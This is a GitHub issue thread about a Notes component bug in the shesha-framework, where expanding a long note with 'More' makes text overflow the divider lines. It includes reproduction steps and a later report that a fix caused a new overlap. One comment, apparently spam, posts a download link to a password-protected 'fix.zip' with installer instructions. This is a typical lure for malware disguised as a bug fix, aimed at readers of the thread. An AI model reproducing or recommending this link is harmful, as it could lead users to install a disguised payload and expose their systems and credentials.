### ISSUE TITLE
When a note is long, clicking 'More' causes it to overlap outside the line section on Notes component

### ISSUE THREAD

**Issue by hlayisanimazuze** [shesha-io/shesha-framework#2065]
By default, a note is displayed with two lines. If the note contains text that exceeds two lines, a 'Show More' option is added. Upon clicking this option, instead of expanding to display the additional text within the divider lines, the text overlaps outside the divider

**Steps to reproduce the behavior:**
1. Go to 'https://function-adminportal-test.shesha.dev/dynamic/TestModule/mondayDetail-view?id=b8834bdc-6ccb-4dd4-a082-fb2e869bda06&firstName=HlayiTestPasswordtested&lastName=Mazuze'
2. On the note component, enter a text that will occupy three lines
3. Click on 'Save'
4. From the notes list, check on the note you've added
5. Click on 'More' option
6. Check how the notes display beyond the divider line
7. Actual Results: The notes overlaps beyond the divider

**Expected behavior**
When a note contains text that exceeds two lines, clicking the 'Show More' option should expand the note to display all additional text within the boundaries of the divider lines, without any overlap

Before clicking more option
![image](https://github.com/user-attachments/assets/f8c543b4-4a24-451c-ae62-968a2d7c863e)

After clicking more
![image](https://github.com/user-attachments/assets/97cf7b70-65e8-4d2c-941d-cfd8e2ab6816)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hlayisanimazuze** [comment]
Hi @Lukeybooi, The fix partially fix the issue and caused another. The divider lines are overlapping or partially covering the user's information text (like timestamps and usernames), which makes it difficult to read. 

![image](https://github.com/user-attachments/assets/79fc8b78-447f-4155-babe-0e2c3ec994bd)
